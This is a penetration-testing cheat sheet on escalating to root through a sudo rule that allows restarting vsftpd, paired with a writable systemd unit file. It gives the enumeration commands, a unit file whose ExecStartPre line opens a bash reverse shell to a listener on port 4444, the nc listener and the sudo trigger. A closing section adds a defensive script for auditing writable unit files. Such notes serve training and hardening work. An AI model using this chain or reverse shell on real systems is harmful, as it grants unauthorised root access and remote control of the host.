# Sudo Service Privilege Escalation

### Investigation

```sh
sudo -l

(ALL : ALL) /usr/sbin/service vsftpd restart
```

If we can execute the **service** command as root, we may be able to escalate to root privileges.


### Exploitation

#### 1. Find the Location of the Config File

Assume we can operate the **vsftpd** service as root. First, find the service config file for vsftpd.

```sh
find / -name "*vsftpd*"
```

For instance, the search may return locations like the following.

```sh
/lib/systemd/system/vsftpd.service
/etc/systemd/system/multi-user.target.wants/vsftpd.service
```

Once we have the locations, the next step is to check their permissions. If we have write permission on any of the files above, we can change what is executed when vsftpd starts.

#### 2. Update the Config File

Insert the reverse shell payload as the value of **ExecStartPre**. With this in place, our listener receives a shell when the FTP daemon is restarted.

```ini
[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
ExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1'

[Install]
WantedBy=multi-user.target
```

Then reload the systemd manager configuration so the modified unit file is picked up.

```sh
systemctl daemon-reload
```

#### 3. Execution

On the local machine, start a listener to receive the shell.

```sh
nc -lvnp 4444
```

Now run the command that we are allowed to execute with sudo.

```sh
sudo /usr/sbin/service vsftpd restart
```

We should get a shell as the root user.
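
The whole chain depends on a unit file that a non-root account can write to, so that condition is what an administrator should audit for. The script below is an added example, not part of the original notes; the function name `audit_units`, the `TRUSTED_UID` variable and the directories passed on the command line are assumptions of this sketch.

```sh
#!/bin/sh
# Added example (not from the original page): list systemd unit files, drop-ins
# and unit directories that an account other than root could modify.
# TRUSTED_UID is an assumption of this sketch: the only UID allowed to own
# unit material (0 = root).
TRUSTED_UID="${TRUSTED_UID:-0}"

# audit_units DIR...
# Prints one path per line for every file or directory under DIR that is
# world-writable, group-writable, or not owned by TRUSTED_UID.
# Group-writable entries are reported so the group's membership can be reviewed.
audit_units() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        # -L judges symlinks such as multi-user.target.wants/*.service by the
        # file they point to, which is the file systemd actually loads.
        find -L "$dir" \( -type f -o -type d \) \
            \( -perm -0002 -o -perm -0020 -o ! -user "$TRUSTED_UID" \) \
            -print 2>/dev/null || true
    done
}

# Usage: sh audit-units.sh /etc/systemd/system /lib/systemd/system
if [ "$#" -gt 0 ]; then
    findings=$(audit_units "$@")
    if [ -n "$findings" ]; then
        printf 'Unit material writable by non-root accounts:\n%s\n' "$findings"
    else
        echo "No writable unit files or directories found."
    fi
fi
```

Any path it reports should be reset to root ownership with mode 0644 (0755 for directories), and sudo rules that allow restarting the affected service should be reviewed alongside it.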



